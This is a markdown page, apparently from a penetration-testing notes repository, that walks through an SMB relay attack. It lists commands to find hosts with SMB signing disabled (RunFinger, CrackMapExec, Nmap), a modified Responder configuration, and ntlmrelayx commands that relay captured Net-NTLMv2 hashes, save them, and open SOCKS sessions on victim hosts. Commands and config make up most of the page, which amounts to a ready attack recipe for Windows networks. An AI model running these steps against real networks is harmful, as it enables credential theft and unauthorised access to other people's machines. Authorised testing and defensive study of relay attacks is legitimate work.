Skip to content

Latest commit

 

History

History
87 lines (57 loc) · 2.48 KB

smb-relaying.md

File metadata and controls

87 lines (57 loc) · 2.48 KB

SMB Relaying

After observing LLMNR and/or NBT-NS traffic with Responder and forcing the client to authenticate to your machine, it is possible for the attacker to relay the Net-NTLMv2 hash obtained to all systems within scope that have SMB Signing Disabled.

Identifying Systems with SMB Signing Disabled

RunFinger.py

Finger is included with Responder.py in the /tools directory. Simply run the tool against either a subnet or file and parse the results using cut

python3 RunFinger.py -i $subnet

CrackMapExec

A list can also easily be created with CrackMapExec:

crackmapexec smb $subnet --gen-relay-list

Nmap

Nmap can also create a list of hosts that have SMB Signing Disabled:

nmap --script=smb-security-mode -p445 $ip

SMB Relaying 101

After confirming LLMNR/NBT-NS traffic and identifying systems with SMB Signing Disabled, we are ready to perform the attack. First, we need modify the Responder.conf file and disable both SMB and HTTP:

# responder.conf

SQL = On
SMB = Off    
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On

We can then run Responder:

responder -I eth0 -dwP

We can then run ntlmrelayx.py from Impacket, supplying our file of hosts previously identified to have SMB Signing Disabled.

# Example generic relaying
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support

# Save hashes from relaying locally
python3 ntlmrelayx.py -tf smbdisabled.out --smb2support -of

Relaying with SOCKS

We can also enable SOCKS support while relaying for interactive sessions. Using this flag will also provide you with a session on the host if the user is not a local administrator:

python3 ntlmrelayx.py -tf smbdisabled.out --smb2support --socks

References

{% embed url="https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html" %}

{% embed url="https://luemmelsec.github.io/Relaying-101/#ntlm-downgrade-attack" %}

{% embed url="https://en.hackndo.com/ntlm-relay" %}

{% embed url="https://docs.microsoft.com/en-us/archive/blogs/josebda/the-basics-of-smb-signing-covering-both-smb1-and-smb2" %}

{% embed url="https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/exploitation/exploit-without-account/smb-relay" %}

{% embed url="https://www.secureauth.com/blog/playing-with-relayed-credentials/" %}